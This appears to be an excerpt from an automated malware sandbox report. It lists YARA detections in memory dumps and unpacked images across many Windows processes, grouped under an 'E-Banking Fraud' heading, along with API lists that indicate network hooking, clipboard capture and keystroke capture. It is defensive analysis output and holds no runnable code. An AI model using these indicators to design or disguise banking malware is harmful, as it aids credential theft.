                        Source: Yara matchFile source: 00000001.00000003.2745411292.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000025.00000002.2952993585.0000000000C90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000022.00000000.2115641562.0000000002400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001D.00000003.2100223475.0000000000EE0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000000.1981353060.00000000003D0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: services.png.exe PID: 6516, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: nyheukpo.exe PID: 1460, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: sihost.exe PID: 3420, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 3456, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 3528, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: ctfmon.exe PID: 3832, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4196, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: StartMenuExperienceHost.exe PID: 4660, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4872, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XRdxSzSUL8yOL.exe PID: 5012, type: MEMORYSTR
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_004263F3 NtCreateUserProcess,NtCreateThread,LdrLoadDll,ExitProcess,GetFileAttributesExW,CreateProcessAsUserA,CreateProcessAsUserW,HttpOpenRequestW,HttpOpenRequestA,HttpSendRequestW,HttpSendRequestA,HttpSendRequestExW,HttpSendRequestExA,HttpEndRequestA,HttpEndRequestW,InternetCloseHandle,InternetReadFile,InternetReadFileExA,InternetSetFilePointer,InternetQueryDataAvailable,HttpQueryInfoA,closesocket,send,WSASend,RegQueryValueExA,RegQueryValueExW,GetMessageW,PeekMessageW,GetClipboardData,PFXImportCertStore,0_2_004263F3
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_0040ECF3 EnterCriticalSection,GetTickCount,LeaveCriticalSection,GetKeyboardState,ToUnicode,0_2_0040ECF3

                        E-Banking Fraud

                        barindex
                        Source: Yara matchFile source: 41.0.XRdxSzSUL8yOL.exe.2c90000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 39.0.XRdxSzSUL8yOL.exe.2b30000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 33.0.XRdxSzSUL8yOL.exe.2e50000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 22.3.SystemSettings.exe.f10000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.3.smartscreen.exe.290000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 33.0.XRdxSzSUL8yOL.exe.2e50000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 19.3.ApplicationFrameHost.exe.180000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 18.0.RuntimeBroker.exe.900000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 20.0.WinStore.App.exe.a10000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.0.dllhost.exe.ac0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 32.0.XRdxSzSUL8yOL.exe.2530000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.3.RuntimeBroker.exe.ab0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 34.0.XRdxSzSUL8yOL.exe.2400000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 24.0.svchost.exe.fb0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 27.3.backgroundTaskHost.exe.e20000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 26.0.conhost.exe.30000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.3.sihost.exe.ac0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 28.3.RuntimeBroker.exe.810000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.0.RuntimeBroker.exe.110000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.0.svchost.exe.910000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.0.svchost.exe.910000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 24.3.svchost.exe.fb0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 40.0.XRdxSzSUL8yOL.exe.2390000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.3.sihost.exe.ac0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.3.explorer.exe.c350000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 30.2.XRdxSzSUL8yOL.exe.2990000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.0.smartscreen.exe.290000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 33.2.XRdxSzSUL8yOL.exe.2e50000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.0.RuntimeBroker.exe.ab0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 38.0.XRdxSzSUL8yOL.exe.2f50000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 35.2.XRdxSzSUL8yOL.exe.25d0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 36.2.XRdxSzSUL8yOL.exe.2ca0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.0.sihost.exe.ac0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 30.0.XRdxSzSUL8yOL.exe.2990000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.0.SearchApp.exe.a90000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 30.2.XRdxSzSUL8yOL.exe.2990000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 27.0.backgroundTaskHost.exe.e20000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.0.RuntimeBroker.exe.ee0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 32.2.XRdxSzSUL8yOL.exe.2530000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.0.XRdxSzSUL8yOL.exe.2e30000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 34.2.XRdxSzSUL8yOL.exe.2400000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.0.svchost.exe.9a0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.0.ctfmon.exe.a50000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.3.RuntimeBroker.exe.ab0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.3.ctfmon.exe.a50000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 40.0.XRdxSzSUL8yOL.exe.2390000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.0.smartscreen.exe.290000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.0.svchost.exe.d40000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.0.sihost.exe.ac0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 41.2.XRdxSzSUL8yOL.exe.2c90000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 32.2.XRdxSzSUL8yOL.exe.2530000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.RuntimeBroker.exe.ee0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 37.0.XRdxSzSUL8yOL.exe.c90000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.3.svchost.exe.d40000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 38.0.XRdxSzSUL8yOL.exe.2f50000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 36.0.XRdxSzSUL8yOL.exe.2ca0000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 34.2.XRdxSzSUL8yOL.exe.2400000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 18.0.RuntimeBroker.exe.900000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.3.RuntimeBroker.exe.110000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.0.RuntimeBroker.exe.3d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.3.RuntimeBroker.exe.110000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 34.0.XRdxSzSUL8yOL.exe.2400000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.3.ctfmon.exe.a50000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.3.smartscreen.exe.290000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 39.0.XRdxSzSUL8yOL.exe.2b30000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 28.0.RuntimeBroker.exe.810000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.0.dllhost.exe.ac0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.services.png.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.0.XRdxSzSUL8yOL.exe.2e30000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.3.dllhost.exe.ac0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.3.RuntimeBroker.exe.3d0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 37.2.XRdxSzSUL8yOL.exe.c90000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 20.3.WinStore.App.exe.a10000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 41.2.XRdxSzSUL8yOL.exe.2c90000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 22.0.SystemSettings.exe.f10000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 36.2.XRdxSzSUL8yOL.exe.2ca0000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.services.png.exe.2810000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 27.0.backgroundTaskHost.exe.e20000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.0.explorer.exe.c350000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.0.RuntimeBroker.exe.3d0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.3.StartMenuExperienceHost.exe.b50000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.2.XRdxSzSUL8yOL.exe.2e30000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 35.2.XRdxSzSUL8yOL.exe.25d0000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 25.3.dllhost.exe.ac0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 16.0.TextInputHost.exe.580000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.0.SearchApp.exe.a90000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 37.0.XRdxSzSUL8yOL.exe.c90000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 18.3.RuntimeBroker.exe.900000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.3.RuntimeBroker.exe.190000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.services.png.exe.2810000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 16.3.TextInputHost.exe.580000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 19.0.ApplicationFrameHost.exe.180000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 18.3.RuntimeBroker.exe.900000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 26.0.conhost.exe.30000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.3.StartMenuExperienceHost.exe.b50000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.2.XRdxSzSUL8yOL.exe.2e30000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 19.0.ApplicationFrameHost.exe.180000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.0.RuntimeBroker.exe.190000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 28.0.RuntimeBroker.exe.810000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 35.0.XRdxSzSUL8yOL.exe.25d0000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 41.0.XRdxSzSUL8yOL.exe.2c90000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 17.3.RuntimeBroker.exe.3d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 23.0.UserOOBEBroker.exe.10000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.0.svchost.exe.9a0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 38.2.XRdxSzSUL8yOL.exe.2f50000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 22.3.SystemSettings.exe.f10000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.3.svchost.exe.910000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 37.2.XRdxSzSUL8yOL.exe.c90000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.0.RuntimeBroker.exe.ab0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 23.3.UserOOBEBroker.exe.10000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 26.3.conhost.exe.30000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.3.svchost.exe.910000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 28.3.RuntimeBroker.exe.810000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 23.0.UserOOBEBroker.exe.10000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 35.0.XRdxSzSUL8yOL.exe.25d0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.0.StartMenuExperienceHost.exe.b50000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 22.0.SystemSettings.exe.f10000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 16.0.TextInputHost.exe.580000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.3.RuntimeBroker.exe.190000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 24.0.svchost.exe.fb0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 24.3.svchost.exe.fb0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 39.2.XRdxSzSUL8yOL.exe.2b30000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 16.3.TextInputHost.exe.580000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 38.2.XRdxSzSUL8yOL.exe.2f50000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 27.3.backgroundTaskHost.exe.e20000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.0.StartMenuExperienceHost.exe.b50000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.0.RuntimeBroker.exe.190000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 36.0.XRdxSzSUL8yOL.exe.2ca0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 32.0.XRdxSzSUL8yOL.exe.2530000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.0.RuntimeBroker.exe.110000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.nyheukpo.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.0.RuntimeBroker.exe.ee0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 20.0.WinStore.App.exe.a10000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.3.nyheukpo.exe.40fb2d4.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.3.explorer.exe.c350000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 30.0.XRdxSzSUL8yOL.exe.2990000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.0.ctfmon.exe.a50000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.3.svchost.exe.9a0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 23.3.UserOOBEBroker.exe.10000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.0.svchost.exe.d40000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.0.explorer.exe.c350000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 40.2.XRdxSzSUL8yOL.exe.2390000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 29.3.RuntimeBroker.exe.ee0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 26.3.conhost.exe.30000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 40.2.XRdxSzSUL8yOL.exe.2390000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 20.3.WinStore.App.exe.a10000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 39.2.XRdxSzSUL8yOL.exe.2b30000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.3.svchost.exe.d40000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 33.2.XRdxSzSUL8yOL.exe.2e50000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.3.svchost.exe.9a0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 19.3.ApplicationFrameHost.exe.180000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000008.00000003.1784947759.0000000000B50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001E.00000000.2102061957.0000000002990000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000029.00000002.2973195709.0000000002C90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000003.1733775300.0000000000910000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000000.1762934350.0000000000D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000012.00000000.1997415854.0000000000900000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000014.00000000.2023199442.0000000000A10000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000013.00000000.2000681241.0000000000180000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000003.2766629012.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000003.2579296491.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000016.00000003.2066202032.0000000000F10000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001F.00000000.2106925891.0000000002E30000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000002.2922936744.0000000000401000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000025.00000000.2123634235.0000000000C90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000019.00000003.2081273338.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000003.1762790225.000000000C350000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000003.2282267263.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2171781778.0000000002B50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000000.1737083449.0000000000A50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000013.00000003.2022956144.0000000000180000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000020.00000000.2109775705.0000000002530000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000000.1955460926.0000000000290000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000003.1965679095.0000000000290000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000028.00000002.2974532793.0000000002390000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000010.00000003.1981080900.0000000000580000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000003.1765021497.0000000000D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000018.00000003.2075250679.0000000000FB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000021.00000000.2113078053.0000000002E50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000012.00000003.2000454832.0000000000900000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000003.1997224283.00000000003D0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000003.2627357615.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001B.00000003.2091183123.0000000000E20000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000027.00000000.2129746271.0000000002B30000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001C.00000000.2091409743.0000000000810000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000000.1732249367.0000000000910000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000026.00000000.2127013709.0000000002F50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001B.00000000.2085005947.0000000000E20000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000019.00000000.2075479994.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000003.1790120113.0000000000110000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000000.1766360463.0000000000B50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000003.1732150846.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000020.00000002.2973995755.0000000002530000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000000.2066606336.0000000000010000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001D.00000000.2096580735.0000000000EE0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000003.1738779911.0000000000A50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000024.00000000.2120619904.0000000002CA0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000021.00000002.2964235219.0000000002E50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2171239086.0000000002810000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000023.00000002.2966547595.00000000025D0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000003.1736960492.00000000009A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000003.2032162611.0000000000190000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000000.2029881834.0000000000190000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000016.00000000.2032466719.0000000000F10000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000E.00000003.1955044832.0000000000AB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000000.1792075779.0000000000A90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000003.2070787045.0000000000010000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001E.00000002.2968177291.0000000002990000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000018.00000000.2070992540.0000000000FB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000E.00000000.1941072289.0000000000AB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000029.00000000.2141291646.0000000002C90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001C.00000003.2096406602.0000000000810000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2167883548.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000026.00000002.2968884434.0000000002F50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001A.00000003.2084799594.0000000000030000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000000.1786038916.0000000000110000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000022.00000002.2961588503.0000000002400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000003.1732075330.0000000002221000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000024.00000002.2973089059.0000000002CA0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001F.00000002.2962312014.0000000002E30000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000023.00000000.2118224056.00000000025D0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000000.1733891566.00000000009A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000000.1754241470.000000000C350000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001A.00000000.2081513411.0000000000030000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000000.1730300340.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000014.00000003.2029731721.0000000000A10000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000028.00000000.2136239624.0000000002390000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000027.00000002.2972478515.0000000002B30000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000010.00000000.1965985487.0000000000580000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000003.2745411292.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000025.00000002.2952993585.0000000000C90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000022.00000000.2115641562.0000000002400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001D.00000003.2100223475.0000000000EE0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000000.1981353060.00000000003D0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
